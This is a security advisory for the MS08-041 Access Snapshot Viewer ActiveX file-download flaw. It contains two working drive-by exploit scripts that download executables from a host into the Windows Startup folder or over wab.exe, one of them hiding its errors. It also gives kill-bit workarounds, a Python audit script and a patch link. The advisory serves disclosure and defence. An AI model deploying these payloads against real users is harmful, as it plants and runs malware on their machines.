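Microsoft Access Snapshot Viewer ActiveX Control Arbitrary File Download Vulnerability (MS08-041)
Release date: 2008-07-07
Updated: 2008-08-13
Affected systems:
Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Description:
BUGTRAQ ID: 30114
CVE(CAN) ID: CVE-2008-2463
Microsoft Access is the relational database management system in the Microsoft Office suite.
Microsoft Access bundles the Snapshot Viewer ActiveX control for conveniently viewing Access report snapshots. The control does not properly validate certain input parameters. If a user is tricked into visiting a malicious site, files from that site can be downloaded to an arbitrary location on the user's machine. This vulnerability is currently being actively exploited.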
<*Source: Bill Sisk
Links: http://secunia.com/advisories/30883/
http://www.kb.cert.org/vuls/id/837785
http://www.microsoft.com/technet/security/advisory/955179.mspx?pf=true
http://blogs.technet.com/msrc/archive/2008/07/07/snapshot-viewer-activex-control-vulnerability.aspx
http://www.us-cert.gov/cas/techalerts/TA08-189A.html
http://www.microsoft.com/technet/security/Bulletin/MS08-041.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA08-225A.html
*>
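Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!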
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
if(objlcx="[object]")
{
setTimeout('window.location = "ldap://"',3000);
for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
var buf1 = 'http://192.168.8.10/333.exe';
var buf2=mycars[x];
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();
}catch(e){}
}
}
</script>
Recommendation:
Workaround:
* Set the kill bit for the following CLSIDs:
{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}
{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}
{F2175210-368C-11D0-AD81-00A0C90DC8D9}
Alternatively, save the following text as a .REG file and import it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400
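An added example, not part of the original advisory: a Python check that parses registry export text (for instance the decoded output of `reg export` on the ActiveX Compatibility key) and reports whether the kill bit (0x400) is set for each of the three CLSIDs above. The function names and the sample export are constructed for illustration.

```python
import re

# CLSIDs listed in the workaround above.
SNAPSHOT_VIEWER_CLSIDS = (
    "{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}",
    "{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}",
    "{F2175210-368C-11D0-AD81-00A0C90DC8D9}",
)
KILL_BIT = 0x00000400
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
              r"\ActiveX Compatibility" + "\\").upper()
_KEY_RE = re.compile(r"^\[(.+)\]$")
_FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9a-fA-F]{1,8})$', re.I)

def parse_compat_flags(reg_text):
    """Map upper-cased CLSID -> Compatibility Flags value found in reg_text."""
    flags, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = _KEY_RE.match(line)
        if key:
            path = key.group(1).upper()
            # Only keys under ActiveX Compatibility count; "[-KEY]" deletions do not.
            current = path[len(COMPAT_KEY):] if path.startswith(COMPAT_KEY) else None
            continue
        value = _FLAGS_RE.match(line)
        if value and current:
            flags[current] = int(value.group(1), 16)
    return flags

def audit_kill_bits(reg_text):
    """Return {clsid: status}; status is 'set', 'not set' or 'missing'."""
    flags = parse_compat_flags(reg_text)
    # Other compatibility bits may also be present; only 0x400 matters here.
    return {c: "missing" if c not in flags
            else "set" if flags[c] & KILL_BIT else "not set"
            for c in SNAPSHOT_VIEWER_CLSIDS}

# Constructed sample export: one CLSID killed, one with another flag only, one absent.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{f0e42d50-368c-11d0-ad81-00a0c90dc8d9}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000020
'''

if __name__ == "__main__":
    for clsid, status in audit_kill_bits(SAMPLE).items():
        print(clsid, status)
```

Registry Editor version 5.00 exports are normally UTF-16 encoded, so decode the file accordingly before passing its text to `audit_kill_bits`.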
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS08-041) and a corresponding patch for this issue:
MS08-041:Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
Link: http://www.microsoft.com/technet/security/Bulletin/MS08-041.mspx?pf=true
